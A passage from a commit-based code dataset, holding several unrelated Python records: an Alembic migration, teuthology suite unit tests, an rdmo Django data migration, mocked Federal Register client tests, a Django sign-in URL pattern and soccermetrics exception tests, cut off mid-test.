Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
|
b6cb3f8cb7a9b11e76c1f7f4b983983d415aa3da
|
teuthology/test/test_suite.py
|
teuthology/test/test_suite.py
|
import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
Add lots of unit tests for teuthology.suite
|
Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com>
|
Python
|
mit
|
SUSE/teuthology,tchaikov/teuthology,dmick/teuthology,robbat2/teuthology,ktdreyer/teuthology,michaelsevilla/teuthology,dreamhost/teuthology,t-miyamae/teuthology,t-miyamae/teuthology,tchaikov/teuthology,yghannam/teuthology,dreamhost/teuthology,ivotron/teuthology,zhouyuan/teuthology,yghannam/teuthology,SUSE/teuthology,zhouyuan/teuthology,caibo2014/teuthology,robbat2/teuthology,ivotron/teuthology,michaelsevilla/teuthology,dmick/teuthology,SUSE/teuthology,ktdreyer/teuthology,caibo2014/teuthology,ceph/teuthology,dmick/teuthology,ceph/teuthology
|
Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com>
|
import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
<commit_before><commit_msg>Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com><commit_after>
|
import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com>import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
<commit_before><commit_msg>Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com><commit_after>import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
|
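One fragility in the suite above: test_ceph_hash calls the live GitHub API, so it fails offline and whenever master moves between the test's request and the one inside get_hash. A sketch of an isolated version; the patch target assumes suite imports requests at module level, which is not confirmed by the commit:

from mock import MagicMock, patch
from teuthology import suite

def test_ceph_hash_offline():
    fake_resp = MagicMock()
    fake_resp.json.return_value = {'object': {'sha': 'deadbeef'}}
    # Stub the HTTP call so the assertion no longer depends on the network.
    with patch('teuthology.suite.requests.get', return_value=fake_resp):
        assert suite.get_hash('ceph') == 'deadbeef'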
2988bc031187a21f5ff6a5c5f6af3af43dbb422c
|
rdmo/questions/migrations/0065_data_migration.py
|
rdmo/questions/migrations/0065_data_migration.py
|
from __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
Add data migration to update questionsets
|
Add data migration to update questionsets
|
Python
|
apache-2.0
|
rdmorganiser/rdmo,rdmorganiser/rdmo,rdmorganiser/rdmo
|
Add data migration to update questionsets
|
from __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
<commit_before><commit_msg>Add data migration to update questionsets<commit_after>
|
from __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
Add data migration to update questionsetsfrom __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
<commit_before><commit_msg>Add data migration to update questionsets<commit_after>from __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
|
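The RunPython operation above has no reverse, so migrating backwards past 0065 raises IrreversibleError. Django ships RunPython.noop for data migrations that are safe to skip on the way down; a sketch of the Migration class with that reverse wired in (run_data_migration is the function from the commit above):

from django.db import migrations

class Migration(migrations.Migration):

    dependencies = [
        ('questions', '0064_widget_type_choices'),
    ]

    operations = [
        # Same forward pass; noop lets the migration be unapplied cleanly.
        migrations.RunPython(run_data_migration, migrations.RunPython.noop),
    ]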
9db3d255c396b4b785ff2f3bfa99b801824cf713
|
tests/federalregister.py
|
tests/federalregister.py
|
from mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
Add tests for federal register client
|
Add tests for federal register client
|
Python
|
cc0-1.0
|
cmc333333/regulations-parser,jmcarp/regulations-parser,tadhg-ohiggins/regulations-parser,tadhg-ohiggins/regulations-parser,grapesmoker/regulations-parser,eregs/regulations-parser,EricSchles/regulations-parser,adderall/regulations-parser,willbarton/regulations-parser,cmc333333/regulations-parser,ascott1/regulations-parser,eregs/regulations-parser
|
Add tests for federal register client
|
from mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
<commit_before><commit_msg>Add tests for federal register client<commit_after>
|
from mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
Add tests for federal register clientfrom mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
<commit_before><commit_msg>Add tests for federal register client<commit_after>from mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
|
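The show_xml container in test_fetch_notice_xml is a Python 2 workaround for rebinding a closure variable. mock also accepts an iterable side_effect, which returns one item per call and makes the two-phase response declarative. A sketch with stand-in values (the HTML stub here is abbreviated, not the real page):

from mock import patch

html_stub = '<script>var dev_formats = {"formats": []};</script>'  # first read()
with patch('parser.federalregister.urlopen') as urlopen:
    # Each call to read() consumes the next item: HTML page, then the XML body.
    urlopen.return_value.read.side_effect = [html_stub, 'XML String']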
8a70a4db5577eaaf7e45f4865fdf49ecb855afe0
|
precision/accounts/urls.py
|
precision/accounts/urls.py
|
from django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
Add url pattern for SignInView class
|
Add url pattern for SignInView class
|
Python
|
mit
|
FreeCodeCampRoma/precision_school-management,FreeCodeCampRoma/precision_school-management,FreeCodeCampRoma/precision_school-management,FreeCodeCampRoma/precision_school-management
|
Add url pattern for SignInView class
|
from django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
<commit_before><commit_msg>Add url pattern for SignInView class<commit_after>
|
from django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
Add url pattern for SignInView classfrom django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
<commit_before><commit_msg>Add url pattern for SignInView class<commit_after>from django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
|
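For reference, the regex-based url() used above is the Django 1.x idiom; on Django 2.0+ the same route is normally spelled with path(), which matches a literal prefix instead of a regex. An equivalent sketch, assuming the same SignInView:

from django.urls import path

from .views import SignInView

urlpatterns = [
    path('sign-in/', SignInView.as_view(), name='login'),
]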
fcfc56bdbe2d9cf1173ac54f75e59c270b1bbbd3
|
tests/test_exceptions.py
|
tests/test_exceptions.py
|
import unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
Add unit testing of custom exceptions
|
Add unit testing of custom exceptions
|
Python
|
mit
|
soccermetrics/soccermetrics-client-py
|
Add unit testing of custom exceptions
|
import unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
<commit_before><commit_msg>Add unit testing of custom exceptions<commit_after>
|
import unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
Add unit testing of custom exceptionsimport unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
<commit_before><commit_msg>Add unit testing of custom exceptions<commit_after>import unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
